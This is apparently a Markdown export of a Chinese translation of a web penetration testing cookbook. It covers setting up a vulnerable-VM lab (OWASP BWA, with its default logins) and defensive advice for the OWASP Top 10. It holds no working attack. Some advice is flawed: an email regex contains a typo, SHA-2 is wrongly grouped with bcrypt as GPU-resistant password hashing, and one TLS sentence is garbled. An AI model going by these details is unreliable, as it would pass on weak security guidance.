215 | VirtualBox 允许我们在我们的 Kali 主机上通过虚拟化运行多个主机。通过它，我们可以使用不同的计算机和操作系统来挂载完整的环境。并同时运行它们，只要 Kali 主机的内存资源和处理能力允许。
216 | 
217 | ### 更多
218 | 
219 | 虚拟机扩展包，提供了 VirtualBox 的虚拟机附加特性，例如 USB 2.0/3.0 支持和远程桌面功能。它可以从 <https://www.virtualbox.org/wiki/Downloads> 下载。在下载完成后双击它，VirtualBox 会做剩余的事情。
220 | 
221 | ### 另见
222 | 
223 | 除此之外有一些可视化选项。如果你使用过程中感到不方便，你可以尝试：
224 | 
225 | + VMware Player/Workstation
226 | + Qemu
227 | + Xen
228 | + KVM
229 | 
230 | ## 1.5 创建漏洞虚拟机
231 | 
232 | 现在我们准备好创建我们的第一个虚拟机，它是托管 Web 应用的服务器，我们使用应用来实践和提升我们的渗透测试技巧。
233 | 
234 | 我们会使用叫做 OWASP BWA（ Broken Web Apps）的虚拟机，它是存在漏洞的 Web 应用的集合，特别为执行安全测试而建立。
235 | 
236 | ### 操作步骤
237 | 
238 | 1.  访问 <http://sourceforge.net/projects/owaspbwa/files/>，并下载最新版本的`.ova`文件。在本书写作过程中，它是`OWASP_Broken_Web_Apps_ VM_1.1.1.ova`。
239 | 
240 |     ![](img/1-5-1.jpg)
241 |     
242 | 2.  等待下载完成，之后打开文件：
243 | 
244 | 3.  VirtualBox 的导入对话框会显示。如果你打算修改机器名称或描述，你可以通过双击值来完成。我们会命名为`vulnerable_vm`，并且使剩余选项保持默认。点击`Import`。
245 | 
246 |     ![](img/1-5-2.jpg)
247 | 
248 | 4.  导入需要花费一分钟，之后我们会看到我们的虚拟机显示在 VirtualBox 的列表中。让我们选中它并点击`Start`。
249 | 
250 | 5.  在机器启动之后，我们会被询问登录名和密码，输入`root`作为登录名，`owaspbwa`作为密码，这样设置。
251 | 
252 |     ![](img/1-5-3.jpg)
253 |     
254 | ### 工作原理
255 | 
256 | OWASP BWA 是一个项目，致力于向安全从业者和爱好者提供安全环境，用于提升攻击技巧，并识别和利用 Web 应用中的漏洞，以便帮助开发者和管理员修复和防止漏洞。
257 | 
258 | 这个虚拟机包含不同类型的 Web 应用，一些基于 PHP，一些基于 Java，甚至还有一些基于 .NET 的漏洞应用。也有一些已知应用的漏洞版本，例如 WordPress 或 Joomla。
259 | 
260 | ### 另见
261 | 
262 | 当我们谈论漏洞应用和虚拟机的时候，有很多选择。有一个著名网站含有大量的此类应用，它是 VulnHub（`https:// www.vulnhub.com/`）。它也有一些思路，帮助你解决一些挑战并提升你的技能。
263 | 
264 | 这本书中，我们会为一些秘籍使用另一个虚拟机： bWapp Bee-box。它也可以从 VulnHub 下载：<https://www.vulnhub.com/entry/bwapp-beebox-v16,53/>。
265 | 
266 | ## 1.6 获取客户端虚拟机
267 | 
268 | 当我们执行中间人攻击（MITM）和客户端攻击时，我们需要另一台虚拟机来向已经建立的服务器发送请求。这个秘籍中，我们会下载 Microsoft Windows 虚拟机并导入到 VirtualBox 中。
269 | 
270 | ### 操作步骤
271 | 
272 | 1.  首先我们需要访问下载站点 <http://dev.modern.ie/tools/ vms/#downloads>。
273 | 
274 | 2.  这本书中，我们会在 Win7 虚拟机中使用 IE8。
275 | 
276 |     ![](img/1-6-1.jpg)
277 |     
278 | 3.  文件下载之后，我们需要解压它。访问它下载的位置。
279 | 
280 | 4.  右击它并点击`Extract Here`（解压到此处）。
281 | 
282 | 5.  解压完成后，打开`.ova`文件并导入到 VirtualBox 中。
283 | 
284 |     ![](img/1-6-2.jpg)
285 |     
286 | 6.  现在启动新的虚拟机（名为`IE8 - Win7`），我们就准备好客户端了。
287 | 
288 |     ![](img/1-6-3.jpg)
289 | 
290 | ### 工作原理
291 | 
292 | Microsoft 向开发者提供了这些虚拟机来在不同的 Windows 和 IE 版本上测试它们的应用，带有 30 天的免费许可，这足以用于实验了。
293 | 
294 | 作为渗透测试者，意识到真实世界的应用可能位于多个平台，这些应用的用户可能使用大量的不同系统和 Web 浏览器来和互相通信非常重要。知道了这个之后，我们应该使用任何客户端/服务器的设施组合，为成功的渗透测试做准备。
295 | 
296 | ### 另见
297 | 
298 | 对于服务端和客户端的虚拟机，如果你在使用已经构建好的配置时感到不便，你总是可以构建和配置你自己的虚拟机。这里是一些关于如何实现的信息：<https://www.virtualbox.org/manual/>。
299 | 
300 | ## 1.7 为正常通信配置虚拟机
301 | 
302 | 为了能够和我们的虚拟服务器和客户端通信，我们需要位于相同网段内。但是将带有漏洞的虚拟机放到局域网中可能存在安全风险。为了避免它，我们会在 VirtualBox 中做一个特殊的配置，允许我们在 Kali 中和服务器及客户端虚拟机通信，而不将它们暴露给网络。
303 | 
304 | ### 准备
305 | 
306 | 在我们开始之前，打开 VirtualBox 并且宝漏洞服务器和客户端虚拟机都关闭了。
307 | 
308 | ### 操作步骤
309 | 
310 | 1.  在 VirtualBox 中访问`File | Preferences… | Network`。
311 | 
312 | 2.  选择`Host-only Networks`标签页。
313 | 
314 | 3.  点击`+`按钮来添加新网络。
315 | 
316 | 4.  新的网络（`vboxnet0`）会创建，它的详细窗口会弹出。如果没有，选项网络并点击编辑按钮来编辑它的属性。
317 | 
318 |     ![](img/1-7-1.jpg)
319 |     
320 | 5.  在对话框中，你可以指定网络配置。如果它不影响你的本地网络配置，将其保留默认。你也可以修改它并使用其它为局域网保留的网段中的地址，例如 10.0.0.0/8、172.16.0.0/12、192.168.0.0/16。
321 | 
322 | 6.  合理配置之后，点击`OK`。
323 | 
324 | 7.  下一步是配置漏洞虚拟机（vulnerable_vm）。选择它并访问它的设置。
325 | 
326 | 8.  点击`Network `并且在`Attached to:`下拉菜单中，选择` Host-only Adapter`。
327 | 
328 | 9.  在`Name`中，选择`vboxnet0`。
329 | 
330 | 0.  点击`OK`。
331 | 
332 |     ![](img/1-7-2.jpg)
333 |     
334 | 1.  在客户端虚拟机（`IE8 - Win7`）中执行第七步到第十步。
335 | 
336 | 2.  在配置完两个虚拟机之后，让我们测试它们是否能真正通信。启动两个虚拟机。
337 | 
338 | 3.  让我们看看宿主系统的网络通信：打开终端并输入：
339 | 
340 |     ```
341 |     ifconfig
342 |     ```
343 |     
344 |     ![](img/1-7-3.jpg)
345 |    
346 | 4.  我们可以看到我们拥有叫做`vboxnet0 `的网络适配器，并且它的 IP 地址为 192.168.56.1。取决于你所使用的配置，这可能有所不同。
347 | 
348 | 5.  登录 vulnerable_vm 并检查适配器`eth0`的 IP 地址。
349 | 
350 |     ```
351 |     ifconfig 
352 |     ```
353 | 
354 | 6.  现在，让我们访问我们的客户端主机`IE8 - Win7`。打开命令行提示符并输入：
355 | 
356 |     ```
357 |     ipconfig 
358 |     ```
359 |     
360 | 7.  现在，我们拥有了三台机器上的 IP 地址。
361 | 
362 |     +   192.168.56.1 ：宿主机
363 |     +   192.168.56.102 ：vulnerable_vm 
364 |     +   192.168.56.103 ：IE8 - Win7
365 | 
366 | 8.  为了测试通信，我们打算从宿主机中 ping 两个虚拟机。
367 | 
368 |     ```
369 |     ping -c 4 192.168.56.102 
370 |     ping -c 4 192.168.56.103
371 |     ```
372 |     
373 |     ![](img/1-7-4.jpg)
374 |     
375 |     ping 会发送 ICMP 请求给目标，并等待回复。这在测试网络上两个节点之间是否可以通信的时候非常有用。
376 |     
377 | 9.  我们对两个虚拟机做相同操作，来检车到服务器和到另一台虚拟机的通信是否正常。
378 | 
379 | 0.  IE8 - Win7 虚拟机可能不响应 ping，这是正常的，因为 Win7 的配置默认不响应 ping。为了检查连接性，我们可以从 Kali 主机使用`arping`。
380 | 
381 |     ```
382 |     arping –c 4 192.168.56.103
383 |     ```
384 |     
385 | ### 工作原理
386 | 
387 | 仅有主机的网络是虚拟网络，它的行为像 LAN，但是它仅仅能够访问宿主机，所运行的虚拟机不会暴露给外部系统。这种网络也为宿主机提供了虚拟适配器来和虚拟机通信，就像它们在相同网段那样。
388 | 
389 | 使用我们刚刚完成的配置，我们就能够在客户端和服务器之间通信，二者都可以跟 Kali 主机通信，Kali 会作为攻击主机。
390 | 
391 | ## 1.8 了解漏洞 VM 上的 Web 应用
392 | 
393 | OWASP BWA 包含许多 Web 应用，其内部含有常见攻击的漏洞。它们中的一些专注于一些特定技巧的实验，而其它尝试复制碰巧含有漏洞的，真实世界的应用。
394 | 
395 | 这个秘籍中，我们会探索 vulnerable_vm，并了解一些其中包含的应用。
396 | 
397 | ### 准备
398 | 
399 | 我们需要启动我们的 vulnerable_vm，并正确配置它的网络。这本书中，我们会使用 192.168.56.102 作为它的 IP 地址。
400 | 
401 | ### 操作步骤
402 | 
403 | 1.  vulnerable_vm 启动后，打开 Kali 主机的 Web 浏览器并访问`http://192.168.56.102`。你会看到服务器所包含的所有应用列表。
404 | 
405 |     ![](img/1-8-1.jpg)
406 |     
407 | 2.  让我们访问`Damn Vulnerable Web Application`。
408 | 
409 | 3.  使用`admin`作为用户名，`admin`作为密码。我们可以看到左边的菜单：菜单包含我们可以实验的所有漏洞的链接：爆破、命令执行、SQL 注入，以及其它。同样，DVWA 安全这部分是我们用于配置漏洞输入的安全（或复杂性）等级的地方。
410 | 
411 |     ![](img/1-8-2.jpg)
412 |     
413 | 4.  登出并返回服务器的主页。
414 | 
415 | 5.  现在我们点击`OWASP WebGoat.NET`。这是个 .NET 应用，其中我们可以实验文件和代码注入攻击，跨站脚本，和加密漏洞。它也含有 WebGoat Coins Customer Portal，它模拟了商店应用，并可以用于实验漏洞利用和漏洞识别。
416 | 
417 |     ![](img/1-8-3.jpg)
418 |     
419 | 6.  现在返回服务器的主页。
420 | 
421 | 7.  另一个包含在虚拟机中的有趣应用是 BodgeIt。它是基于 JSP 的在线商店的最小化版本。它拥有我们可以加入购物车的商品列表，带有高级选项的搜索页面，为新用户准备的注册表单，以及登录表单。这里没有到漏洞的直接引用，反之，我们需要自己找它们。
422 | 
423 |     ![](img/1-8-4.jpg)
424 |     
425 | 8.  我们在一个秘籍中不能浏览所有应用，但是我们会在这本书中使用它们。
426 | 
427 | ### 工作原理
428 | 
429 | 主页上的应用组织为六组：
430 | 
431 | +   训练应用：这些应用分为几部分，专注于实验特定的漏洞或攻击技巧。他它们中的一些包含教程、解释或其他形式的指导。
432 | 
433 | +   真实的，内部含有漏洞的应用：这些应用的行为就像真实世界的应用（商店】博客或社交网络）一样，但是开发者出于训练目的在内部设置了漏洞。
434 | 
435 | +   真实应用的旧（漏洞）版本：真是应用的旧版本，例如 WordPress 和 Joomla 含有已知的可利用的漏洞。这对于测试我们的漏洞识别技巧非常实用。
436 | 
437 | +   用于测试工具的应用：这个组中的应用可以用做自动化漏洞扫描器的基准线测试。
438 | 
439 | +   演示页面/小应用：这些小应用拥有一个或一些漏洞，仅仅出于演示目的。
440 | 
441 | +   OWASP 演示应用：OWASP AppSensor 是个有趣的应用，它模拟了社交网络并含有一些漏洞。但是他会记录任何攻击的意图，这在尝试学习的时候很有帮助。例如，如何绕过一些安全设备，例如网络应用防火墙。
442 | 


--------------------------------------------------------------------------------
/ch10.md:
--------------------------------------------------------------------------------
  1 | # 第十章 OWASP Top 10 的预防
  2 | 
  3 | > 作者：Gilberto Najera-Gutierrez
  4 | 
  5 | > 译者：[飞龙](https://github.com/)
  6 | 
  7 | > 协议：[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)
  8 | 
  9 | ## 简介
 10 | 
 11 | 每个渗透测试的目标都是识别应用、服务器或网络中的可能缺陷，它们能够让攻击者有机会获得敏感系统的信息或访问权限。检测这类漏洞的原因不仅仅是了解它们的存在以及推断出其中的漏洞，也是为了努力预防它们或者将它们降至最小。
 12 | 
 13 | 这一章中，我们会观察一些如何预防多数 Web 应用漏洞的例子和推荐，根据 OWASP：
 14 | 
 15 | https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project 
 16 | 
 17 | ## A1 预防注入攻击
 18 | 
 19 | 根据 OWASP，Web 应用中发现的最关键的漏洞类型就是一些代码的注入攻击，例如 SQL 注入、OS 命令注入、HTML 注入（XSS）。
 20 | 
 21 | 这些漏洞通常由应用的弱输入校验导致。这个秘籍中，我们会设计一些处理用户输入和构造所使用的请求的最佳实践。
 22 | 
 23 | ### 操作步骤
 24 | 
 25 | 1.  为了防止注入攻击，首先需要合理校验输入。在服务端，这可以由编写我们自己的校验流程来实现，但是最佳选择是使用语言自己的校验流程，因为它们更加广泛使用并测试过。一个极好的激励就是 PHP 中的` filter_var `，或者 ASP.NET 中的 校验助手。例如，PHP 中的邮箱校验类似于：
 26 | 
 27 |     ```php
 28 |     function isValidEmail($email){ 
 29 |         return filter_var($email, FILTER_VALIDATE_EMAIL); 
 30 |     }
 31 |     ```
 32 |     
 33 | 2.  在客户端，检验可以由创建 JavaScript 校验函数来完成，使用正则表达式。例如，邮箱检验流程是：
 34 | 
 35 |     ```js
 36 |     function isValidEmail (input) { 
 37 |         var result=false; 
 38 |         var email_regex = /^[a-zA-Z0-9._-]+@([a-zA-Z0-9.-]+\.)+[azA-Z0-9.-]{2,4}$/; 
 39 |         if ( email_regex.test(input) ) {  
 40 |             result = true; 
 41 |         } 
 42 |         return result; 
 43 |     }
 44 |     ```
 45 |     
 46 | 3.  对于 SQL 注入，避免拼接输入值为查询十分关键。反之，使用参数化查询。每个编程语言都有其自己的版本：
 47 | 
 48 |     PHP MySQLLi：
 49 | 
 50 |     ```php
 51 |     $query = $dbConnection->prepare('SELECT * FROM table WHERE name = ?'); 
 52 |     $query->bind_param('s', $name); 
 53 |     $query->execute(); 
 54 |     ```
 55 |     
 56 |     C#：
 57 |     
 58 |     ```csharp
 59 |     string sql = "SELECT * FROM Customers WHERE CustomerId = @ CustomerId"; 
 60 |     SqlCommand command = new SqlCommand(sql); command.Parameters.Add(new SqlParameter("@CustomerId", System. Data.SqlDbType.Int)); 
 61 |     command.Parameters["@CustomerId"].Value = 1; 
 62 |     ```
 63 |     
 64 |     Java：
 65 |     
 66 |     ```java
 67 |     String custname = request.getParameter("customerName"); 
 68 |     String query = "SELECT account_balance FROM user_data WHERE user_ name =? ";  
 69 |     PreparedStatement pstmt = connection.prepareStatement( query ); 
 70 |     pstmt.setString( 1, custname); 
 71 |     ResultSet results = pstmt.executeQuery( ); 
 72 |     ```
 73 |     
 74 | 4.  考虑注入出现的时机，对减少可能的损失总量也有帮助。所以，使用低权限的系统用户来运行数据库和 Web 服务器。
 75 | 
 76 | 5.  确保输入用于连接数据库服务器的用户不是数据库管理员。
 77 | 
 78 | 6.  禁用甚至删除允许攻击者执行系统命令或提权的储存过程，例如 MSSQL 服务器中的`xp_cmdshell `。
 79 | 
 80 | ### 工作原理
 81 | 
 82 | 预防任何类型代码注入攻击的主要部分永远是合理的输入校验，位于服务端也位于客户端。
 83 | 
 84 | 对于 SQL 注入，始终使用参数化或者预编译查询。而不是拼接 SQL 语句和输入。参数化查询将函数参数插入到 SQL 语句特定的位置，消除了程序员通过拼接构造查询的需求。
 85 | 
 86 | 这个秘籍中，我们使用了语言内建的校验函数，但是如果你需要校验一些特殊类型的参数，你可以通过使用正则表达式创建自己的版本。
 87 | 
 88 | 除了执行正确校验，我们也需要在一些人蓄意注入一些代码的情况下，降低沦陷的影响。这可以通过在操作系统的上下文中为 Web 服务器合理配置用户权限，以及在数据库服务器上下文中配置数据库和 OS 来实现。
 89 | 
 90 | ### 另见
 91 | 
 92 | 对于数据校验来讲，最有用的工具就是正则表达式。在处理和过滤大量信息的时候，它们也能够让渗透测试变得更容易。所以好好了解它们很有必要。我推荐你查看一些站点：
 93 | 
 94 | +   http://www.regexr.com/ 一个很好的站点，其中我们可以获得示例和参数并测试我们自己的表达式来查看是否有字符串匹配。
 95 | 
 96 | +   http://www.regular-expressions.info 它包含教程和实例来了解如何使用正则表达式。它也有一份实用的参考，关于主流语言和工具的特定实现。
 97 | 
 98 | +   http://www.princeton.edu/~mlovett/reference/Regular-Expressions.pdf （Jan Goyvaerts 编写的《Regular Expressions, The Complete Tutorial》）就像它的标题所说，它是个正则表达式的非常完备的脚本，包含许多语言的示例。
 99 | 
100 | ## A2 构建合理的身份验证和会话管理
101 | 
102 | 带有缺陷的身份验证和会话管理是当今 Web 应用中的第二大关键的漏洞。
103 | 
104 | 身份验证是用户证明它们是它们所说的人的过程。这通常通过用户名和密码来完成。一些该领域的常见缺陷是宽松的密码策略，以及隐藏式的安全（隐藏资源缺乏身份验证）。
105 | 
106 | 会话管理是登录用户的会话标识符的处理。在 Web 服务器中，这可以通过实现会话 Cookie 和标识来完成。这些标识符可以植入、盗取，或者由攻击者使用社会工程、XSS 或 CSRF 来“劫持”。所以，开发者必须特别注意如何管理这些信息。
107 | 
108 | 这个秘籍中，我们会设计到一些实现用户名/密码身份验证，以及管理登录用户的会话标识符的最佳实践。
109 | 
110 | ### 操作步骤
111 | 
112 | 1.  如果应用中存在只能由授权用户查看的页面、表单或者任何信息片段，确保在展示它们之前存在合理的身份验证。
113 | 
114 | 2.  确保用户名、ID、密码和所有其它身份验证数据是大小写敏感的，并且对每个用户唯一。
115 | 
116 | 3.  建立强密码策略，强迫用户创建至少满足下列条件的密码：
117 | 
118 |     +   对于 8 个字符，推荐 10 个。
119 |     +   使用大写和小写字母。
120 |     +   至少使用一个数字。
121 |     +   至少使用一个特殊字符（空格、` !`、`&`、`#`、`%`，以及其它）。
122 |     +   禁止用户名、站点名称、公司名称或者它们的变体（大小写转换、l33t、它们的片段）用于密码。
123 |     +   禁止使用“常见密码”列表中的密码：https://www.teamsid.com/worst-passwords-2015/ 。
124 |     +   永远不要显示用户是否存在或者信息格式是否正确的错误信息。对不正确的登录请求、不存在的用户、名称或密码不匹配模式、以及所有可能的登录错误使用相同的泛化信息。这种信息类似于：
125 |     
126 |         登录数据不正确。
127 |         
128 |         用户名或密码无效。
129 |         
130 |         访问禁止。
131 |         
132 | 4.  密码不能以纯文本格式储存在数据库中。使用强哈希算法，例如 SHA-2、scrypt、或者 bcrypt，它们特别为难以使用 GPU 破解而设计。
133 | 
134 | 5.  在对比用户输入和密码时，计算输入的哈希之后比较哈希之后的字符串。永远不要解密密码来使用纯文本用户输入来比较。
135 | 
136 | 6.  避免基本的 HTML 身份验证。
137 | 
138 | 7.  可能的话，使用多因素验证（MFA），这意味着使用不止一个身份验证因素来登录：
139 | 
140 |     +   一些你知道的（账户信息或密码）
141 |     
142 |     +   一些你拥有的（标识或手机号）
143 |     
144 |     +   一些你的特征（生物计量）
145 |     
146 | 8.  如果可能的话，实现证书、预共享密钥、或其它无需密码的身份校验协议（OAuth2、OpenID、SAML、或者 FIDO）。
147 | 
148 | 9.  对于会话管理，推荐使用语言内建的会话管理系统，Java、ASP.NET和 PHP。它们并不完美，但是能够确保提供设计良好和广泛测试的机制，而且比起开发团队在时间紧迫情况下的自制版本，它们更易于实现。
149 | 
150 | 0.  始终为登录和登录后的页面使用 HTTPS -- 显然，要防止只接受 SSL 和 TLS v1.1 连接。
151 | 
152 | 1.  为了确保 HTTPS 能够生效，可以使用 HSTS。它是由 Web 应用指定的双向选择的特性。通过 Strict-Transport-Security 协议头，它在 `http://`存在于 URL 的情况下会重定向到安全的选项，并防止“无效证书”信息的覆写。例如使用 Burp Suite 的时候会出现的情况。更多信息请见： https://www.owasp.org/index.php/HTTP_Strict_Transport_Security 。
153 | 
154 | 2.  始终设置 HTTPOnly 和安全的 Cookie 属性。
155 | 
156 | 3.  设置最少但实际的会话过期时间。确保正常用户离开之后，攻击者不能复用会话，并且用户能够执行应用打算执行的操作。
157 | 
158 | ### 工作原理
159 | 
160 | 身份校验机制通常在 Web 应用中简化为用户名/密码登录页面。虽然并不是最安全的选择，但它对于用户和开发者最简单，以及当密码被盗取时，最重要的层面就是它们的强度。
161 | 
162 | 我们可以从这本书看到，密码强度由破解难度决定，通过爆破、字典或猜测。这个秘籍的第一个提示是为了使密码更难以通过建立最小长度的混合字符集来破解，难以通过排除更直觉的方案（用户名、常见密码、公司名称）来猜测，并且通过使用强哈希或加密储存，难以在泄露之后破解。
163 | 
164 | 对于会话管理来说，过期时间、唯一性和会话 ID 的强度（已经在语言内建机制中实现），以及 Cookie 设置中的安全都是关键的考虑因素。
165 | 
166 | 谈论身份校验安全的最重要的层面是，如果消息可以通过中间人攻击拦截或者服务，没有任何安全配置、控制或强密码是足够安全的。所以，合理配置的加密通信频道的使用，例如 TLS，对保护我们的用户身份数据来说极其重要。
167 | 
168 | ### 另见
169 | 
170 | OWASP 拥有一些非常好的页面，关于身份校验和会话管理。我们推荐你在构建和配置 Web 应用时阅读并仔细考虑它们。
171 | 
172 | +   https://www.owasp.org/index.php/Authentication_Cheat_Sheet
173 | +   https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
174 | 
175 | ## A3 预防跨站脚本
176 | 
177 | 我们之前看到，跨站脚本，在展示给用户的数据没有正确编码，并且浏览器将其解释并执行为脚本代码时发生。这也存在输入校验因素，因为恶意代码通常由输入变量插入。
178 | 
179 | 这个秘籍中，我们会涉及开发者所需的输入校验和输出编码，来防止应用中的 XSS 漏洞。
180 | 
181 | ### 工作原理
182 | 
183 | 1.  应用存在 XSS 漏洞的第一个标志是，页面准确反映了用户提供的输入。所以，尝试不要使用用户提供的信息来构建输出文本。
184 | 
185 | 2.  当你需要将用户提供的信息放在输出页面上时，校验这些数据来防止任何类型代码的插入。我们已经在 A1 中看到如何实现它。
186 | 
187 | 3.  出于一些原因，如果用户被允许输入特殊字符或者代码段，在它插入到输出之前，过滤或合理编码文本。
188 | 
189 | 4.  对于过滤，在 PHP 中，可以使用`filter_var `。例如，如果你想让字符串为邮件地址：
190 | 
191 |     ```php
192 |     $email = "john(.doe)@exa//mple.com"; 
193 |     $email = filter_var($email, FILTER_SANITIZE_EMAIL); 
194 |     echo $email;
195 |     ```
196 |     
197 |     对于编码，你可以在 PHP 中使用`htmlspecialchars `：
198 |     
199 |     ```php
200 |     $str = "The JavaScript HTML tags are <script> for opening, and </ script>  for closing."; 
201 |     echo htmlspecialchars($str); 
202 |     ```
203 |     
204 | 5.  在 .NET 中，对于 4.5 及更高版本，` System.Web.Security.AntiXss`命名空间提供了必要的工具。对于 .NET 框架 4 及之前的版本，你可以使用 Web 保护库：`http://wpl.codeplex.com/`。
205 | 
206 | 6.  同样，为了防止储存型 XSS，在储存进数据库或从数据库获取之前，编码或过滤每个信息片段。
207 | 
208 | 7.  不要忽略头部、标题、CSS和页面的脚本区域，因为它们也可以被利用。
209 | 
210 | ### 工作原理
211 | 
212 | 除了合理的输入校验，以及不要将用户输入用作输出信息，过滤和编码也是防止 XSS 的关键层面。
213 | 
214 | 过滤意味着从字符串移除不允许的字符。这在输入字符串中存在特殊字符时很实用。
215 | 
216 | 编码将特殊字符转换为 HTML 代码表示。例如，`&`变为`&amp;`、`<`变为`&lt;`。一些应用允许在输入字符串中使用特殊字符，对它们来说过滤不是个选择。所以应该在将输入插入页面，或者储存进数据库之前编码输入。
217 | 
218 | ### 另见
219 | 
220 | OWASP 拥有值得阅读的 XSS 预防速查表：
221 | 
222 | +   https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet 
223 | 
224 | ## A4 避免直接引用不安全对象
225 | 
226 | 当应用允许攻击者（也是校验过的用户）仅仅修改请求中的，直接指向系统对象的参数值，来访问另一个未授权的对象时，就存在不安全对象的直接引用（IDOR）。我们已经在本地文件包含和目录遍历漏洞中看到了一些例子。
227 | 
228 | 根据 OWASP，IDOR 是 Web 应用中第四大关键漏洞。这些漏洞通常由不良的访问控制实现，或者“隐藏式安全”策略（如果用户不能看到它，他们就不能知道它的存在）导致。这些在没有经验的开发者之中是个常见的做法。
229 | 
230 | 这个秘籍中，我们会涉及在设计访问控制机制时应该考虑的关键层面，以便预防 IDOR 漏洞。
231 | 
232 | ### 操作步骤
233 | 
234 | 1.  使用非直接引用优于直接引用。例如，不要通过参数中的名称来引用页面（`URL?page="restricted_page"`），而是要创建索引，并在内部处理它（`URL?page=2`）。
235 | 
236 | 2.  将非直接引用映射到用户（会话）层面，于是用户仅仅能够访问授权的对象，即使它们修改了下标。
237 | 
238 | 3.  在传递相应对象之前校验引用，如果请求的用户没有权限来访问，展示通用错误页面。
239 | 
240 | 4.  输入校验也是很重要的，尤其是目录遍历和文件包含的情况下。
241 | 
242 | 5.  永远不要采取“隐藏式安全”的策略。如果有些文件包含受限的信息，即使它没有引用，有些人也会把它翻出来。
243 | 
244 | ### 工作原理
245 | 
246 | 不安全对象的直接引用在 Web 应用中的表现形式有所不同，从目录遍历到敏感的 PDF 文档的引用。但是它们的大多数都依赖于一个假设，即用户永远不会找到方法来访问不能显式访问的东西。
247 | 
248 | 为了防止这种漏洞，需要在设计和开发期间执行一些积极操作。设计可靠授权机制，来验证尝试访问一些信息的用户的关键是，是否用户真正允许访问它。
249 | 
250 | 将引用对象映射为下标来避免对象名称直接用于参数值（就像 LFI 中的那样）是第一步。攻击者也可以修改下标，这很正常，就像对对象名称所做的那样。但是数据库中存在下标-对象的表的话，添加字段来规定访问所需的权限级别，比起没有任何表并且直接通过名称来访问资源，要容易得多。
251 | 
252 | 之前说过，下标的表可能包含访问对象所需的权限级别，更加严格的话还有拥有者的 ID。所以，它只能够在请求用户是拥有者的情况下访问。
253 | 
254 | 最后，输入校验必须存在于 Web 应用安全的每个层面。
255 | 
256 | ## A5 基本的安全配置指南
257 | 
258 | 系统的默认配置，包括操作系统和Web 服务器，多数用于演示和强调他们的基本或多数有关特性，并不能保护它们不被攻击。
259 | 
260 | 一些常见的可能使系统沦陷的默认配置，是数据库、Web 服务器或CMS 安装时创建的默认管理员账户，以及默认管理员页面、默认栈回溯错误信息，以及其它。
261 | 
262 | 这个秘籍中，我们会涉及 OWASP Top 10 中第五大关键漏洞，错误的安全配置。
263 | 
264 | ### 操作步骤
265 | 
266 | 1.  可能的话，删除所有管理员应用，例如 Joomla 的 admin，WordPress 的 admin，PhpMyAdmin，或者 Tomcat Manager。如果不能这样，使它们只能从本地网络访问，例如，在 Apache 服务器中禁止来自外部网络的 PhpMyAdmin 访问，修改`httd.conf`文件（或者相应的站点配置文件）。
267 | 
268 |     ```
269 |     <Directory /var/www/phpmyadmin>
270 |     
271 |         Order Deny,Allow  
272 |         Deny from all  
273 |         Allow from 127.0.0.1 ::1  
274 |         Allow from localhost  
275 |         Allow from 192.168  
276 |         Satisfy Any
277 |         
278 |     </Directory>
279 |     ```
280 |     
281 |     这会首先禁止所有地址到`phpmyadmin`目录的访问，之后它允许任何来自 locaohost 和以`192.168`开头的地址的请求，这是本地网络的地址。
282 |     
283 | 2.  修改所有 CMS、应用、数据库、服务器和框架的所有管理员密码，使其强度足够。一些应用的例子是：
284 | 
285 |     +   Cpanel 
286 |     +   Joomla 
287 |     +   WordPress 
288 |     +   PhpMyAdmin 
289 |     +   Tomcat manager
290 |     
291 | 3.  禁用所有不必要或未使用的服务器和应用特性。从日常或每周来看，新的漏洞都出现在 CMS 的可选模块和插件中。如果你的应用不需要它们，就不要激活它们。
292 | 
293 | 4.  始终执行最新的安全补丁和更新。在生成环境，建立测试环境来预防使站点不工作的缺陷十分重要，因为新版本存在一些兼容性及其它问题。
294 | 
295 | 5.  建立不会泄露跟踪信息、软件版本、程序组件名称，或任何其它调试信息的自定义的错误页面。如果开发者需要跟踪错误记录或者一些一些标识符对于技术支持非常必要，创建带有简单 ID 和错误描述的索引，并只展示 ID 给用户。所以当错误报告给相关人士的时候，它们会检查下标并且知道发生了什么错误。
296 | 
297 | 6.  采取“最小权限原则”。每个用户在每个层面（操作系统、数据库、或应用）上都应该只能够严格访问正确操作所需的信息。
298 | 
299 | 7.  使用上一个要点来考虑账户，构建安全配置的原则，并且将其应用到每个新的实现、更新或发布以及当前系统中。
300 | 
301 | 8.  强制定期的安全测试或审计，来帮助检测错误配置或遗漏的补丁。
302 | 
303 | ### 工作原理
304 | 
305 | 谈论安全和配置问题时，“细节决定成败”十分恰当。web 服务器、数据库服务器、CMS、或者应用配置应该在完全可用和实用、以及保护用户和拥有者之间取得平衡。
306 | 
307 | Web 应用的一个常见错误配置就是一些 Web 管理站点对整个互联网都可见。这看起来并不是个大问题，但是我们应该知道，管理员登录页面更容易吸引攻击者，因为它可以用于获得高级权限等级，并且任何 CMS、数据或者站点管理工具都存在已知的常用默认密码列表。所以，我们强烈推荐不要把这些管理站点暴露给外部，并且尽可能移除它们。
308 | 
309 | 此外，强密码的使用，以及修改默认密码（即使它们是强密码），在发布应用到公司内部网络，以及互联网的时候需要强制执行。当今，当我们将服务器开放给外部的时候，它收到的第一个流量就是端口扫描，登录页面请求，以及登录尝试，甚至在第一个用户知道该应用之前。
310 | 
311 | 自定义错误页面的使用有助于安全准备，因为 Web 服务器和应用中的默认的错误信息展示太多的信息（从攻击者角度），它们关于错误、所使用的编程语言、栈回溯、所使用的数据库、操作系统以及其它。这些信息不应该暴露，因为它会帮助我们理解应用如何构建，并且提供所使用软件的版本和名称。攻击者通过这些信息就可以搜索已知漏洞，并构造更加有效的攻击过程。
312 | 
313 | 一旦我们的服务器上的部署应用和所有服务都正确配置，我们就可以制订安全原则并且将其应用于所有要配置的新服务器或者已更新的服务器，或者当前带有合理规划的生产服务器。
314 | 
315 | 这个配置原则需要持续测试，以便改进它以及持续保护新发现的漏洞。
316 | 
317 | ## A6 保护敏感数据
318 | 
319 | 当应用储存或使用敏感信息（信用卡号码、社会安全号码、健康记录，以及其它）时，必须采取特殊的手段来保护它们，因为它可能为负责保护它们的组织带来严重的信用、经济或者法律损失，以及被攻破。
320 | 
321 | OWASP Top 10 的第六名是敏感数据泄露，它发生在应该保护的数据以纯文本泄露，或者带有弱安全措施的时候。
322 | 
323 | 这个秘籍中，我们会涉及一些处理、传递和储存这种数据类型的最佳实践。
324 | 
325 | ### 操作步骤
326 | 
